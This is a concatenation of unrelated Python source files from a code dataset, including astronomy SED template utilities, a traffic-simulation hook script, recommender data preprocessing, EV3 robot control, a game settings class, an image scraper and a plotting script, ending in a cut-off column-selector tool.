zint = np.interp(z, self.template_redshifts, np.arange(self.NZ),\n left=0, right=self.NZ-1)\n \n if redshift_type == 'nearest':\n iz = np.round(zint).astype(int)\n else:\n iz = zint.astype(int)\n \n return iz\n \n def integrate_filter(self, filt, flam=False, scale=1., z=0, include_igm=False, redshift_type='nearest', iz=None):\n \"\"\"\n Integrate the template through a `FilterDefinition` filter object.\n \n The `grizli` interpolation module should be used if possible: \n https://github.com/gbrammer/grizli/\n \"\"\"\n try:\n import grizli.utils_c\n interp = grizli.utils_c.interp.interp_conserve_c\n except ImportError:\n interp = utils.interp_conserve\n \n if hasattr(filt, '__len__'):\n filts = filt\n single = False\n else:\n filts = [filt]\n single = True\n \n if include_igm > 0:\n igmz = self.igm_absorption(z, pow=include_igm)\n else:\n igmz = 1.\n \n # Fnu flux density, with IGM and scaling\n if iz is None:\n iz = self.zindex(z=z, redshift_type=redshift_type)\n \n fnu = self.flux_fnu(iz)*scale*igmz\n \n fluxes = []\n for filt_i in filts: \n templ_filt = interp(filt_i.wave, self.wave*(1+z),\n fnu, left=0, right=0)\n \n # f_nu/lam dlam == f_nu d (ln nu) \n integrator = np.trapz\n temp_int = 
integrator(filt_i.throughput*templ_filt/filt_i.wave, \n filt_i.wave) \n temp_int /= filt_i.norm\n \n if flam:\n temp_int *= utils.CLIGHT*1.e10/(filt_i.pivot/(1+z))**2\n \n fluxes.append(temp_int)\n \n if single:\n return fluxes[0]\n else:\n return np.array(fluxes)\n \n def igm_absorption(self, z, scale_tau=1., pow=1):\n \"\"\"\n Compute IGM absorption. \n \n `power` scales the absorption strength as `~eazy.igm.Inoue14()**pow`.\n \"\"\"\n try:\n from . import igm as igm_module\n except:\n from eazy import igm as igm_module\n \n igm = igm_module.Inoue14(scale_tau=scale_tau)\n igmz = self.wave*0.+1\n lyman = self.wave < 1300\n igmz[lyman] = igm.full_IGM(z, (self.wave*(1+z))[lyman])**pow\n return igmz\n \n def integrate_filter_list(self, filters, include_igm=True, norm_index=None, **kwargs):\n \"\"\"\n Integrate template through all filters\n \n filters: list of `~eazy.filters.Filter` objects\n \n [rewritten as simple wrapper]\n \"\"\" \n fluxes = self.integrate_filter(filters, include_igm=include_igm, \n **kwargs) \n if isinstance(norm_index, int):\n fluxes /= fluxes[norm_index]\n \n return fluxes\n \n def to_table(self, formats={'wave':'.5e', 'flux':'.5e'}, with_units=False, flatten=True):\n from astropy.table import Table\n import astropy.units as u\n import copy\n \n tab = Table()\n tab['wave'] = self.wave\n tab['flux'] = self.flux.T\n \n if with_units:\n tab['wave'].unit = u.Angstrom\n tab['flux'].unit = u.erg/u.second/u.cm**2/u.Angstrom\n\n for c in tab.colnames:\n if c in formats:\n tab[c].format = formats[c]\n \n tab.meta = copy.deepcopy(self.meta)\n if self.NZ > 1:\n tab.meta['NZ'] = self.NZ\n for j in range(self.NZ):\n tab.meta[f'Z{j}'] = self.template_redshifts[j]\n else:\n if flatten:\n tab['flux'] = self.flux[0,:]\n \n return tab\n \nclass ModifiedBlackBody():\n \"\"\"\n Modified black body: nu**beta * BB(nu) \n + FIR-radio correlation\n \n \n \"\"\"\n def __init__(self, Td=47, beta=1.6, q=2.34, alpha=-0.75):\n self.Td = Td\n self.q = q\n self.beta = beta\n self.alpha = alpha\n \n @property \n def bb(self):\n from astropy.modeling.models import BlackBody\n return BlackBody(temperature=self.Td*u.K)\n \n def __call__(self, wave, q=None):\n \"\"\"\n Return modified BlackBody (fnu) as a function of wavelength\n \"\"\"\n from astropy.constants import L_sun, h, k_B, c\n if not hasattr(wave, 'unit'):\n mu = wave*u.micron\n else:\n mu = wave\n \n nu = (c/mu).to(u.Hz).value\n mbb = (self.bb(nu)*nu**self.beta).value\n lim = (mu > 40*u.micron) & (mu < 120*u.micron) \n lir = np.trapz(mbb[lim][::-1], nu[lim][::-1])\n \n if q is None:\n q = self.q\n \n radio = 10**(np.log10(lir/3.75e12)-q)\n radio *= (nu/1.4e9)**self.alpha\n \n return (mbb+radio)\n \n def __repr__(self):\n label = r'$T_\\mathrm{{{{d}}}}$={0:.0f}, $\\beta$={1:.1f}'\n return label.format(self.Td, self.beta)\n\n\nPHOENIX_LOGG_FULL = [3.0, 3.5, 4.0, 4.5, 5.0, 5.5]\nPHOENIX_LOGG = [4.0, 4.5, 5.0, 5.5]\n\nPHOENIX_TEFF_FULL = [400.0, 420.0, 450.0, 500.0, 550.0, 600.0, 650.0, 700.0, 750.0, 800.0, 850.0, 900.0, 950.0, 1000.0, 1050.0, 1100.0, 1150.0, 1200.0, 1250.0, 1300.0, 1350.0, 1400.0, 1450.0, 1500.0, 1550.0, 1600.0, 1650.0, 1700.0, 1750.0, 1800.0, 1850.0, 1900.0, 1950.0, 2000.0, 2100.0, 2200.0, 2300.0, 2400.0, 2500.0, 2600.0, 2700.0, 2800.0, 2900.0, 3000.0, 3100.0, 3200.0, 3300.0, 3400.0, 3500.0, 3600.0, 3700.0, 3800.0, 3900.0, 4000.0, 4100.0, 4200.0, 4300.0, 4400.0, 4500.0, 4600.0, 4700.0, 4800.0, 4900.0, 5000.0]\n\nPHOENIX_TEFF = [400., 420., 450., 500., 550., 600., 650., 700., 750.,\n 800., 850., 900., 950., 1000., 1050., 1100., 
1150., 1200.,\n 1300., 1400., 1500., 1600., 1700., 1800., 1900., 2000., 2100.,\n 2200., 2300., 2400., 2500., 2600., 2700., 2800., 2900., 3000.,\n 3100., 3200., 3300., 3400., 3500., 3600., 3700., 3800., 3900., 4000.,\n 4200., 4400., 4600., 4800., 5000., 5500., 5500, 6000., 6500., 7000.]\n\nPHOENIX_ZMET_FULL = [-2.5, -2.0, -1.5, -1.0, -0.5, -0., 0.5]\nPHOENIX_ZMET = [-1.0, -0.5, -0.]\n\ndef load_phoenix_stars(logg_list=PHOENIX_LOGG, teff_list=PHOENIX_TEFF, zmet_list=PHOENIX_ZMET, add_carbon_star=True, file='bt-settl_t400-7000_g4.5.fits'):\n \"\"\"\n Load Phoenix stellar templates\n \"\"\"\n try:\n from urllib.request import urlretrieve\n except:\n from urllib import urlretrieve\n\n from astropy.table import Table\n import astropy.io.fits as pyfits\n \n paths = ['/tmp', './templates/', './']\n hdu = None\n for path in paths:\n templ_path = os.path.join(path, file)\n if os.path.exists(templ_path):\n print(f'phoenix_templates: {templ_path}')\n hdu = pyfits.open(templ_path)\n break\n \n if hdu is None:\n url = 'https://s3.amazonaws.com/grizli/CONF'\n print('Fetch {0}/{1}'.format(url, file))\n\n #os.system('wget -O /tmp/{1} {0}/{1}'.format(url, file))\n res = urlretrieve('{0}/{1}'.format(url, file),\n filename=templ_path)\n\n hdu = pyfits.open(templ_path)\n\n tab = Table.read(hdu[1])\n\n tstars = []\n N = tab['flux'].shape[1]\n for i in range(N):\n teff = tab.meta['TEFF{0:03d}'.format(i)]\n logg = tab.meta['LOGG{0:03d}'.format(i)]\n if 'ZMET{0:03d}'.format(i) in tab.meta:\n met = tab.meta['ZMET{0:03d}'.format(i)]\n else:\n met = 0.\n\n if (logg not in logg_list) | (teff not in teff_list) | (met not in zmet_list):\n #print('Skip {0} {1}'.format(logg, teff))\n continue\n\n label = 'bt-settl_t{0:05.0f}_g{1:3.1f}_m{2:.1f}'.format(teff, logg, met)\n arrays = (tab['wave'], tab['flux'][:, i])\n tstars.append(Template(arrays=arrays, name=label, redfunc=None))\n\n cfile = 'templates/stars/carbon_star.txt'\n if add_carbon_star & os.path.exists(cfile):\n sp = Table.read(cfile, format='ascii.commented_header')\n if add_carbon_star > 1:\n import scipy.ndimage as nd\n cflux = nd.gaussian_filter(sp['flux'], add_carbon_star)\n else:\n cflux = sp['flux']\n\n tstars.append(Template(arrays=(sp['wave'], cflux), \n name='carbon-lancon2002'))\n\n return tstars\n \n# class TemplateInterpolator():\n# \"\"\"\n# Class to use scipy spline interpolator to interpolate pre-computed eazy template \n# photometry at arbitrary redshift(s).\n# \"\"\"\n# def __init__(self, bands=None, MAIN_OUTPUT_FILE='photz', OUTPUT_DIRECTORY='./OUTPUT', CACHE_FILE='Same', zout=None, f_lambda=True):\n# from scipy import interpolate\n# #import threedhst.eazyPy as eazy\n# \n# #### Read the files from the specified output\n# tempfilt, coeffs, temp_seds, pz = eazy.readEazyBinary(MAIN_OUTPUT_FILE=MAIN_OUTPUT_FILE, OUTPUT_DIRECTORY=OUTPUT_DIRECTORY, CACHE_FILE = CACHE_FILE)\n# \n# if bands is None:\n# self.bands = np.arange(tempfilt['NFILT'])\n# else:\n# self.bands = np.array(bands)\n# \n# self.band_names = ['' for b in self.bands]\n# \n# if zout is not None:\n# param = eazy.EazyParam(PARAM_FILE=zout.filename.replace('.zout','.param'))\n# self.band_names = [f.name for f in param.filters]\n# self.bands = np.array([f.fnumber-1 for f in param.filters])\n# \n# self.NFILT = len(self.bands)\n# self.NTEMP = tempfilt['NTEMP']\n# self.lc = tempfilt['lc'][self.bands]\n# self.sed = temp_seds\n# self.templam = self.sed['templam']\n# self.temp_seds = self.sed['temp_seds']\n# \n# # if True:\n# # import threedhst\n# # import unicorn\n# # threedhst.showMessage('Conroy 
model', warn=True)\n# # cvd12 = np.loadtxt(unicorn.GRISM_HOME+'/templates/cvd12_t11_solar_Chabrier.dat')\n# # self.temp_seds[:,0] = np.interp(self.templam, cvd12[:,0], cvd12[:,1])\n# \n# self.in_zgrid = tempfilt['zgrid']\n# self.tempfilt = tempfilt['tempfilt'][self.bands, :, :]\n# if f_lambda:\n# for i in range(self.NFILT):\n# self.tempfilt[i,:,:] /= (self.lc[i]/5500.)**2\n# \n# ###### IGM absorption\n# self.igm_wave = []\n# self.igm_wave.append(self.templam < 912)\n# self.igm_wave.append((self.templam >= 912) & (self.templam < 1026))\n# self.igm_wave.append((self.templam >= 1026) & (self.templam < 1216))\n# \n# self._spline_da = interpolate.InterpolatedUnivariateSpline(self.in_zgrid, temp_seds['da'])\n# self._spline_db = interpolate.InterpolatedUnivariateSpline(self.in_zgrid, temp_seds['db'])\n# \n# #### Make a 2D list of the spline interpolators\n# self._interpolators = [range(self.NTEMP) for i in range(self.NFILT)] \n# for i in range(self.NFILT):\n# for j in range(self.NTEMP):\n# self._interpolators[i][j] = interpolate.InterpolatedUnivariateSpline(self.in_zgrid, self.tempfilt[i, j, :])\n# #\n# self.output = None\n# self.zout = None\n# \n# def interpolate_photometry(self, zout):\n# \"\"\"\n# Interpolate the EAZY template photometry at `zout`, which can be a number or an \n# array.\n# \n# The result is returned from the function and also stored in `self.output`.\n# \"\"\" \n# output = [range(self.NTEMP) for i in range(self.NFILT)] \n# for i in range(self.NFILT):\n# for j in range(self.NTEMP):\n# output[i][j] = self._interpolators[i][j](zout)\n# \n# self.zgrid = np.array(zout)\n# self.output = np.array(output)\n# return self.output\n# \n# def check_extrapolate(self):\n# \"\"\"\n# Check if any interpolated values are extrapolated from the original redshift grid\n# \n# Result is both returned and stored in `self.extrapolated`\n# \"\"\"\n# if self.zout is None:\n# return False\n# \n# self.extrapolated = np.zeros(self.output.shape, dtype=np.bool) ## False\n# \n# bad = (self.zgrid < self.in_zgrid.min()) | (self.zgrid > self.in_zgrid.max())\n# self.extrapolated[:, :, bad] = True\n# \n# return self.extrapolated\n# \n# def get_IGM(self, z, matrix=False, silent=False):\n# \"\"\"\n# Retrieve the full SEDs with IGM absorption\n# \"\"\"\n# ###### IGM absorption\n# # lim1 = self.templam < 912\n# # lim2 = (self.templam >= 912) & (self.templam < 1026)\n# # lim3 = (self.templam >= 1026) & (self.templam < 1216)\n# \n# igm_factor = np.ones(self.templam.shape[0])\n# igm_factor[self.igm_wave[0]] = 0.\n# igm_factor[self.igm_wave[1]] = 1. - self._spline_db(z)\n# igm_factor[self.igm_wave[1]] = 1. 
- self._spline_da(z)\n# \n# if matrix:\n# self.igm_factor = np.dot(igm_factor.reshape(-1,1), np.ones((1, self.NTEMP)))\n# else:\n# self.igm_factor = igm_factor\n# \n# self.igm_z = z\n# self.igm_lambda = self.templam*(1+z)\n# \n# if not silent:\n# return self.igm_lambda, self.igm_factor\n\ndef param_table(templates):\n \"\"\"\n Try to generate parameters for a list of templates from their \n metadata\n \n (TBD)\n \"\"\"\n pass\n\n\ndef bspline_templates(wave, degree=3, df=6, get_matrix=True, log=False, clip=1.e-4, minmax=None):\n \"\"\"\n B-spline basis functions, modeled after `~patsy.splines`\n \"\"\"\n from collections import OrderedDict\n from scipy.interpolate import splev\n\n order = degree+1\n n_inner_knots = df - order\n inner_knots = np.linspace(0, 1, n_inner_knots + 2)[1:-1]\n\n norm_knots = np.concatenate(([0, 1] * order,\n inner_knots))\n norm_knots.sort()\n\n if log:\n xspl = np.log(wave)\n else:\n xspl = wave*1\n\n if minmax is None:\n mi = xspl.min()\n ma = xspl.max()\n else:\n mi, ma = minmax\n\n width = ma-mi\n all_knots = norm_knots*width+mi\n\n n_bases = len(all_knots) - (degree + 1)\n basis = np.empty((xspl.shape[0], n_bases), dtype=float)\n\n coefs = np.identity(n_bases)\n basis = splev(xspl, (all_knots, coefs, degree))\n\n for i in range(n_bases):\n out_of_range = (xspl < mi) | (xspl > ma)\n basis[i][out_of_range] = 0\n\n wave_peak = np.round(wave[np.argmax(basis, axis=1)])\n\n maxval = np.max(basis, axis=1)\n for i in range(n_bases):\n basis[i][basis[i] < clip*maxval[i]] = 0\n\n if get_matrix:\n return np.vstack(basis).T\n\n temp = OrderedDict()\n for i in range(n_bases):\n key = 'bspl {0} {1:.0f}'.format(i, wave_peak[i])\n temp[key] = Template(arrays=(wave*1., basis[i]), name=key, \n meta={'wave_peak':wave_peak[i]})\n #temp[key].name = key\n #temp[key].wave_peak = wave_peak[i]\n\n temp.knots = all_knots\n temp.degree = degree\n temp.xspl = xspl\n\n return temp\n\n\ndef gaussian_templates(wave, centers=[], widths=[], norm=False):\n \"\"\"\n Make Gaussian \"templates\" for the template correction\n \"\"\"\n _x = np.array([1/np.sqrt(2*np.pi*w**2)**norm*np.exp(-(wave-c)**2/2/w**2) \n for c, w in zip(centers, widths)])\n return _x.T\n\n\n \n ","sub_path":"eazy/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":31632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247697821","text":"from AAPI import *\nfrom angParams import ResultFileName\nfrom secIDs_table import secIDs\nfrom secSourceIDs_table import secSourceIDs\nfrom AllSections import AllSections\nimport sys\nimport csv\n# the file angParams.py is in the TR/PyInputs directory\n# we only record events after the warmupPeriod (900sec ie 15min)\nmatrixFilePath = 'C:/Users/Krishna/Dropbox/CriticalOD/PythonFiles/ODpairsListForResult.txt'\n#global variables\nfile2 = 0\ntotNbVeh = 0\ntotTT = 0 \n\ndef AAPILoad():\n\treturn 0\n\ndef AAPIInit():\n\t#AKIPrintString( \"AAPIInit\" )\n\treturn 0\n\ndef AAPIManage(time, timeSta, timeTrans, acycle):\n\treturn 0\n\ndef AAPIPostManage(time, timeSta, timeTrans, acycle):\n\treturn 0\n\ndef AAPIFinish():\n\tglobal file2\n\tglobal totExtraVeh\n\t#AKIPrintString( \"AAPIFinish\" )\n\n\t#Get the average link travel time deviation\n\tnbSecs = len(AllSections)\n\tSumTravelTimeDeviation = 0\n\tSumLinkVehicles = 0\n\tfor secIter in range(0,nbSecs):\n\t\tcurrSecID = AllSections[secIter] \n\t\tsectStruct = AKIEstGetGlobalStatisticsSection(currSecID,0)\n\t\tcurrTime = sectStruct.TTd\n\t\tcurrNbVeh = 
sectStruct.Flow\n\t\tSumTravelTimeDeviation = SumTravelTimeDeviation + currTime*currNbVeh\n\t\tSumLinkVehicles = SumLinkVehicles + currNbVeh;\n\tAvgLinkTTDeviation = (SumTravelTimeDeviation/60)/(SumLinkVehicles)\n\n\tcrs = open(matrixFilePath, \"r\")\n\titer = 0;\n\tfor columns in ( raw.strip().split() for raw in crs ):\n\t\titer = iter+1;\n\tmatrix = [[0]*2 for i in range(iter)]\n\tcrs.close()\n\tcrs = open(matrixFilePath, \"r\")\n\n\tSumODTravelTimeDeviation = 0\n\tSumODLinkVehicles = 0\n\titer = 0;\n\tfor columns in ( raw.strip().split() for raw in crs ):\n\t\tmatrix[iter][0]=int(columns[0])\n\t\tmatrix[iter][1]=int(columns[1])\n\t\titer = iter+1;\n\tcrs.close()\n\n\t#for ODIter in range(0,iter):\n\tODStruct = AKIEstGetGlobalStatisticsODPair(3695,3753, 0)\n\t#SumODTravelTimeDeviation = SumODTravelTimeDeviation + ODStruct.TTa\n\t#SumODLinkVehicles = SumODLinkVehicles + ODStruct.Flow\n\t#AvgODTTDeviation = (SumODTravelTimeDeviation/60)/(iter)\n\n\tfile2 = open(ResultFileName, 'a')\n\tfile2.write('%f %f %f %f %d\\n'%(totTT/(totNbVeh*60),0,AvgLinkTTDeviation,ODStruct.TTa,ODStruct.report))\n\tfile2.close()\n\n\treturn 0\n\ndef AAPIUnLoad():\n\treturn 0\n\ndef AAPIPreRouteChoiceCalculation(time, timeSta):\n\treturn 0\n\n\n############################################################################\n\ndef AAPIEnterVehicle( a_nVehId, a_nSectionId ):\n\tAKIVehSetAsTracked( a_nVehId )\n\treturn 0\n\n\n############################################################################\n\ndef AAPIExitVehicle( a_nVehId, a_nSectionId ):\n\tglobal totNbVeh\n\tglobal totTT\n\tif (AKIGetCurrentSimulationTime()>900):\n\t\tinfVeh = AKIVehTrackedGetInf( a_nVehId )\n\t\tAKIVehSetAsNoTracked( a_nVehId )\n\t\ttotNbVeh = totNbVeh+1\n\t\ttotTT = totTT + (AKIGetCurrentSimulationTime()-infVeh.SystemEntranceT)\n\treturn 0\n\n\n\n############################################################################\n####\n\n","sub_path":"PythonFiles/GetAvgLinkVar.py","file_name":"GetAvgLinkVar.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"490096597","text":"import os\nimport json\n\nUser_Feature = 'ECommAI_ubp_round1_user_feature'\nItem_Feature = 'ECommAI_ubp_round1_item_feature'\nUser_Item = 'ECommAI_ubp_round1_train'\nTest = 'ECommAI_ubp_round1_test'\nData_Path = '../data'\nOut_Path = '../data'\n\n\ndef generate_index():\n    \"\"\"\n    Output files:\n        user_lookup: user index and original uid\n        test_out_uid: users that appear in the test file but not in the\n            user-feature file (user index and original uid)\n        item_lookup: item index and original id\n        index_train: records of ECommAI_ubp_round1_train with user ids and\n            item ids mapped to their indices; users missing from both the\n            user-feature and test files, and items missing from the\n            item-feature file, are dropped\n        abnormal_uid: records of ECommAI_ubp_round1_train whose user appears\n            in neither the user-feature file nor the test file\n        abnormal_iid: records of ECommAI_ubp_round1_train whose item does not\n            appear in the item-feature file\n    \"\"\"\n    user_dict = {}\n    item_dict = {}\n    index = 0\n    print('Generating user index...')\n    with open(User_Feature, 'r') as f_u, open(os.path.join(Out_Path, 'user_lookup'), 'w') as o_f_u:\n        for line in f_u:\n            uid = int(line.split()[0])\n            user_dict[uid] = index\n            o_f_u.write('%d\\t%d\\n' % (index, uid))\n            index += 1\n        # find users that appear in the test file but are missing from the user-feature file\n        with open(Test, 'r') as o_f_tu, open(os.path.join(Out_Path, 'test_out_uid'), 'w') as o_f_tou:\n            for line in o_f_tu:\n                tuid = int(line.split()[0])\n                if tuid not in user_dict:\n                    user_dict[tuid] = index\n                    o_f_u.write('%d\\t%d\\n' % (index, tuid))\n                    o_f_tou.write('%d\\t%d\\n' % (index, tuid))\n                    index += 1\n                    print('Out Range User: %d' % tuid)\n    print('Generating item index...')\n
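    # NOTE (illustrative only, not in the original script): the lookup files\n    # written above are plain 'index<TAB>original_id' tables, so reading one\n    # back is just, e.g.:\n    #     with open(os.path.join(Out_Path, 'user_lookup')) as f:\n    #         lookup = {int(i): int(orig) for i, orig in (l.split() for l in f)}\n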
    with open(Item_Feature, 'r') as f_i, open(os.path.join(Out_Path, 'item_lookup'), 'w') as o_f_i:\n        for line in f_i:\n            iid = int(line.split()[0])\n            item_dict[iid] = index\n            o_f_i.write('%d\\t%d\\n' % (index, iid))\n            index += 1\n    print('Generating user-item records...')\n    with open(User_Item, 'r') as f_ui, open(os.path.join(Out_Path, 'index_train'), 'w') as o_f_ui, \\\n            open(os.path.join(Out_Path, 'abnormal_uid'), 'w') as o_f_au, \\\n            open(os.path.join(Out_Path, 'abnormal_iid'), 'w') as o_f_ai:\n        abnormal_uid, abnormal_iid, normal_count = 0, 0, 0\n        for line in f_ui:\n            fields = line.split()\n            uid, iid = int(fields[0]), int(fields[1])\n            if uid not in user_dict:\n                abnormal_uid += 1\n                o_f_au.write(line)\n                continue\n            if iid not in item_dict:\n                abnormal_iid += 1\n                o_f_ai.write(line)\n                continue\n            fields[0] = str(user_dict[uid])\n            fields[1] = str(item_dict[iid])\n            o_f_ui.write('\\t'.join(fields)+'\\n')\n            normal_count += 1\n        print('Valid records: %d, dropped for missing user: %d, dropped for missing item: %d' % (normal_count, abnormal_uid, abnormal_iid))\n\n\ndef generate_meta():\n    print('Generating meta info...')\n    meta = {\n        \"node_type_num\": 2,\n        \"edge_type_num\": 4,\n        \"node_uint64_feature_num\": 0,\n        \"node_float_feature_num\": 0,\n        \"node_binary_feature_num\": 0,\n        \"edge_uint64_feature_num\": 0,\n        \"edge_float_feature_num\": 0,\n        \"edge_binary_feature_num\": 0\n    }\n    with open(os.path.join(Out_Path, 'meta'), 'w') as o_f_m:\n        json.dump(meta, o_f_m, indent=4)\n\n\nif __name__ == \"__main__\":\n    User_Feature = os.path.join(Data_Path, User_Feature)\n    Item_Feature = os.path.join(Data_Path, Item_Feature)\n    User_Item = os.path.join(Data_Path, User_Item)\n    Test = os.path.join(Data_Path, Test)\n    #generate_index()\n    generate_meta()\n","sub_path":"data_process/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539195853","text":"class Settings:\r\n    \"\"\"\r\n    A class for storing all the settings of the Alien Invasion game.\r\n    \"\"\"\r\n    def __init__(self):\r\n        \"\"\"Initializes the settings\"\"\"\r\n        # screen settings\r\n        self.screen_width = 1200\r\n        self.screen_height = 800\r\n        self.bg_color = (230, 230, 230)\r\n        # bullet settings\r\n        self.bullet_speed_factor = 0.5\r\n        self.bullets_allowed = 3\r\n        self.bullet_width = 3\r\n        self.bullet_height = 7\r\n        self.bullet_color = (255, 60, 60)\r\n        # ship settings\r\n        self.ship_speed_factor = 0.5\r\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"275385961","text":"#!/usr/bin/env python3\n\n\nfrom threading import Thread\n\nfrom track3r_ev3dev1 import Track3r\n\n\nclass Track3rWithGrippingClaw(Track3r):\n    is_gripping = False\n\n    def grip_or_release_claw_by_ir_beacon(\n            self,\n            speed: float = 1000   # deg/s\n    ):\n        while True:\n            if self.remote_control.beacon:\n                if self.is_gripping:\n                    self.medium_motor.run_forever(speed_sp=-speed)\n\n                    self.speaker.play(wav_file='/home/robot/sound/Air release.wav').wait()\n\n                    self.is_gripping = False\n\n                else:\n                    self.medium_motor.run_forever(speed_sp=speed)\n\n                    self.speaker.play(wav_file='/home/robot/sound/Airbrake.wav').wait()\n\n                    self.is_gripping = True\n\n                while self.remote_control.beacon:\n                    pass\n\n\n    def main(self,\n             speed: float = 1000   # deg/s\n             ):\n        Thread(target=self.grip_or_release_claw_by_ir_beacon).start()\n\n        self.keep_driving_by_ir_beacon(speed=speed)\n\n\nif __name__ == '__main__':\n    TRACKER_WITH_GRIPPING_CLAW = Track3rWithGrippingClaw()\n\n    
TRACKER_WITH_GRIPPING_CLAW.main()\n","sub_path":"Computing-Platforms/EV3/Home-Edition/Core-Robots/Track3r/Track3r-3-with-Gripping-Claw.EV3Dev1.Threading.py","file_name":"Track3r-3-with-Gripping-Claw.EV3Dev1.Threading.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"199707565","text":"import urllib.request\nimport urllib.parse\nimport re\nimport time\n\n\ndef getHtml(url, header):\n request = urllib.request.Request(url, headers = header)\n response = urllib.request.urlopen(request)\n html = response.read().decode(\"gbk\")\n\n return html\n\ndef getaddressofpic(html):\n r_key = \"\\\"(.*?)\\\"\"\n key = re.compile(r_key)\n\n piclist = re.findall(key, html)\n\n return piclist\n\ndef saving(piclist):\n for each in piclist:\n address = each[1]\n name = each[0]\n print(name)\n print(address)\n urllib.request.urlretrieve(address, \"/Users/wangguibin/Desktop/%s.jpg\"%name)\n\n\ndef paqu():\n for num in range(5550, 5580):\n if num % 10 != 3:\n url = \"http://www.meizitu.com/a/\" + str(num) + \".html\"\n\n header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\"}\n\n html = getHtml(url, header)\n\n piclist = getaddressofpic(html)\n\n saving(piclist)\n\n\n else:\n url = \"http://www.meizitu.com/a//\" + str(num) + \".html\"\n\n header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\"}\n\n html = getHtml(url, header)\n\n piclist = getaddressofpic(html)\n\n saving(piclist)\n\n time.sleep(60)\n\n\nif __name__ == \"__main__\":\n paqu()\n\n\nprint(\"爬取成功!\")\n","sub_path":"爬虫参考/netmeizitu.py","file_name":"netmeizitu.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"621516938","text":"import os\r\nimport glob\r\nfrom PIL import Image\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torchvision import transforms\r\nfrom preprocessing import Equalizer\r\n\r\ntransform_default = transforms.Compose([\r\n transforms.Resize((256, 256)),\r\n Equalizer(),\r\n transforms.ToTensor(),\r\n# transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n# std=[0.229, 0.224, 0.225])\r\n ])\r\n\r\n\r\nclass DatasetFromDir(Dataset):\r\n def __init__(self, root_dir, size=None, transform=None):\r\n self.root_dir = root_dir\r\n filename_all = glob.glob(self.root_dir+'/**/*.jpg')\r\n if size:\r\n size = min(size, len(filename_all))\r\n self.filename_all = filename_all[:size]\r\n else:\r\n self.filename_all = filename_all\r\n \r\n if transform:\r\n self.transform = transform\r\n else:\r\n self.transform = transform_default\r\n \r\n \r\n def __len__(self):\r\n return len(self.filename_all)\r\n \r\n def __getitem__(self, idx):\r\n filename = os.path.basename(self.filename_all[idx])\r\n image = Image.open(self.filename_all[idx])\r\n image = self.transform(image)\r\n sample = {'image': image, 'filename': filename}\r\n return sample","sub_path":"src/anomaly_detection/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562932826","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 8 10:51:40 2018\n\n@author: tejas.shetty\n\"\"\"\n\n# import numpy as np\n# import matplotlib.pyplot as plt\n# from 
pylab import plot, show\nfrom numpy import pi, linspace\nfrom matplotlib.pyplot import figure, plot, xlabel, ylabel, title\nfrom matplotlib.pyplot import savefig, show\nfrom dressedcrab import dcrab\nfrom parameters import tmax, Nt\n\nmax_num_runs = 5\nNc = 3\nwmax = pi\nbulim = linspace(0.1, 1, 20) # [1,1e-3]#0.1creates errors\n# bulim = [1,1e-6]\ncounter = 0\nfido = []\nfor ulim in bulim:\n print(\"counter\", counter)\n optimab, optimw, final_fidelity = \\\n dcrab(max_num_runs, Nc, ulim, wmax, counter)\n time = linspace(0, tmax, Nt)\n fido.append(final_fidelity)\n\n# plt.figure(counter + 1)\n# plot(optima)\n# show()\n# ylabel = (\"optima\")\n# plt.figure(counter+2)\n# plot(optimb)\n# show()\n# ylabel = (\"optimb\")\n# plt.figure(counter +3)\n# plot(optimw)\n# show()\n# ylabel = (\"optimw\")\n counter += 1\n\n\nfigure(counter+1)\nplot(bulim, fido)\nxlabel('ulim')\nylabel('fidelity')\nplot_name = 'Plot of fidelity versus ulim'\ntitle(plot_name)\nshow()\nsavefig('fid_vs_ulim.png')\n\n\n'''\nNum_runs = 5\nNc =3\nulim =1\nwmax = np.pi\noptima, optimb, optimw, optimab = DCRAB(Num_runs,Nc,ulim,wmax)\n'''\n","sub_path":"ulim2plots.py","file_name":"ulim2plots.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643575082","text":"#!/usr/bin/env python3\n\n'''\n ColumnSelector\n\n @Author: wavefancy@gmail.com\n @Version: 1.0\n\n @Algorithms\n 1. Select or remove lines according to the values of specified column.\n\n @Version 2.0\n 1. Add function to copy comments line, comments started by #.\n\n @Version 3.0\n 1. Add function to read keys from file.\n'''\nimport sys\nfrom signal import signal, SIGPIPE, SIG_DFL\nsignal(SIGPIPE,SIG_DFL) #prevent IOError: [Errno 32] Broken pipe. If pipe closed by 'head'.\n\ndef help():\n sys.stderr.write('''\n -------------------------------------\n ColumnSelector\n -------------------------------------\n\n @Author: wavefancy@gmail.com\n @Version: 3.0\n\n @Usages:\n para1: Column index to compare with keys.\n para2: k|r, keep or remove those lines which indicated by keys.\n para3-n: keys. (the logic between them is OR)\n para[-f keyfile, optional]: read keys from 'keyfile'.\n\n @Optional:\n -c : Directly copy comment line to stdout, no action performed, comments started by #.\n\n @Notes:\n 1. Read input from stdin, and output to 